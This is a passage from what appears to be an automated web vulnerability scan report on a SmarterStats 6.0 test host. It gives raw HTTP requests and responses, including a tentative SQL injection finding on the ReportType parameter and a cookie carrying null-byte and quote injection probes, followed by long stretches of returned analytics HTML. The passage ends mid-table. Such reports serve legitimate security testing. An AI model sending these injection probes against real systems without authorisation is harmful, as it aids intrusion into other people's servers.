<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', [], [], [], 90, 'ctl00');
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

<div class="ErrorSetting">
<div class="ErrorLabel">
Page:
</div>
<span id="ctl00_MPH_lblPageName">&#x2F;default.aspx</span>
</div>
<div class="ErrorSetting">
<div class="ErrorLabel">
Message
</div>
<span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/11/2010 8:22:12 PM and has been logged. Please contact your system administrator.</p></span>
</div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

<div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='1' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>

</form>
</body>
</html>

Request 2

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}%00''

Response 2

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:22:12 GMT
X-AspNet-Version: 4.0.30319
Location: /default.aspx
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:22:12 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 130
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/default.aspx">here</a>.</h2>
</body></html>

2.23. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [ReportType parameter]

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The ReportType parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ReportType parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard'&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%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%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%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%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%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%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%3D&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMRepor
t=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:14:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 44336

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |37083|updatePanel|ctl00_MPH_UP1|
           <div class="Report"><div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/a1713db43e9e47dd914134f0f3e27189.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent5'></div>
797</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
537</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
11,857</td>
<td class='ar percentcol rc'>
<div class='percent percent9'></div>
96</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,743</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
151</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
7,291</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
264</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
46</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
57</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
576</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
354</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
11</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
160</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>476</td>
<td class='FooterAverages ar percentcol'>82</td>
<td class='FooterAverages ar percentcol'>2,053</td>
<td class='FooterAverages ar rc percentcolrc'>37</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browser Versions</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="BrowserVersions"> <div class='ReportChart'><img src="/Temp/a443c3433e3c481fa60ed20e09e0396a.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='al '>Version</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='al '>3.6</td>

<td class='ar percentcol '>
<div class='percent percent4'></div>
606</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
407</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
10,080</td>
<td class='ar percentcol rc'>
<div class='percent percent9'></div>
82</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Firefox</td>

<td class='al '>3</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
99</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
73</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
571</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>IE</td>

<td class='al '>6</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
332</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
67</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
1,588</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
16</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>IE</td>

<td class='al '>8</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
62</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
51</td>
<td class='ar percentcol '>
<div class='percent percent5'></div>
1,966</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
15</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Bots, Spiders</td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Unknown</td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
46</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
57</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Firefox</td>

<td class='al '>3.5</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
62</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
29</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
840</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
8</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Firefox</td>

<td class='al '>4</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
28</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
26</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
364</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>IE</td>

<td class='al '>7</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,347</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent9'></div>
3,717</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
232</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='al '></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (13)</td>
<td class='FooterTotal al '>&nbsp;</td>
<td class='FooterTotal ar percentcol'>56</td>
<td class='FooterTotal ar percentcol'>47</td>
<td class='FooterTotal ar percentcol'>1,145</td>
<td class='FooterTotal ar rc percentcolrc'>9</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal al '>&nbsp;</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages al '>&nbsp;</td>
<td class='FooterAverages ar percentcol'>207</td>
<td class='FooterAverages ar percentcol'>35</td>
<td class='FooterAverages ar percentcol'>893</td>
<td class='FooterAverages ar rc percentcolrc'>16</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Platforms</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Platforms"> <div class='ReportChart'><img src="/Temp/62a611a443bc4f55b5bd9e8fcf1d4d70.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Platform</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Win XP</td>

<td class='ar percentcol '>
<div class='percent percent6'></div>
830</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
396</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
9,573</td>
<td class='ar percentcol rc'>
<div class='percent percent8'></div>
77</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Win 7 / 2008 R2</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
214</td>
<td class='ar percentcol '>
<div class='percent percent10'></div>
161</td>
<td class='ar percentcol '>
<div class='percent percent11'></div>
4,311</td>
<td class='ar percentcol rc'>
<div class='percent percent3'></div>
35</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Win Vista / 2008</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
3,443</td>
<td class='ar percentcol '>
<div class='percent percent6'></div>
103</td>
<td class='ar percentcol '>
<div class='percent percent13'></div>
5,151</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
244</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
30</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
43</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
107</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
45</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
42</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
124</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
86</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
104</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Linux</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
44</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
14</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
315</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Android 2.1</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
12</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
367</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>iPhone OS 4</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
132</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (8)</td>
<td class='FooterTotal ar percentcol'>37</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>269</td>
<td class='FooterTotal ar rc percentcolrc'>3</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>4,768</td>
<td class='FooterTotal ar percentcol'>820</td>
<td class='FooterTotal ar percentcol'>20,539</td>
<td class='FooterTotal ar rc percentcolrc'>373</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>264</td>
<td class='FooterAverages ar percentcol'>45</td>
<td class='FooterAverages ar percentcol'>1,141</td>
<td class='FooterAverages ar rc percentcolrc'>21</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Result Codes</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes"> <div class='ReportChart'><img src="/Temp/e16b789c86b7422894a28b9231fbfe31.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Result Code</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>200 - OK</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
19,653</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>404 - Not Found</td>

<td class='ar percentcol rc'>
<div class='percent percent6'></div>
4,771</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>400 - Bad Request</td>

<td class='ar percentcol rc'>
<div class='percent percent2'></div>
1,945</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>304 - Not Modified</td>

<td class='ar percentcol rc'>
<div class='percent percent1'></div>
884</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>500 - Internal Server Error</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
711</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>403 - Forbidden</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
182</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>405 - Method Not Allowed</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
81</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>301 - Moved Permanently</td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>28,229</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>3,528</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">404 - Page Not Found</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes_404"> <div class='ReportChart'><img src="/Temp/2c3f186c97414f658527d91815802306.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>File</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fnull.htw','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>null.htw</a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
198</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcontent%2ffastdial.html','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>content<wbr /><span class='slash'>/</span>fastdial.html</a></td>

<td class='ar percentcol rc'>
<div class='percent percent14'></div>
111</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fWebResource.axd','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>WebResource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent13'></div>
105</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fLogin.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>Login.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent7'></div>
57</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fforum%2findex.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>forum<wbr /><span class='slash'>/</span>index.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
42</td>
</tr>
<tr class="alt">
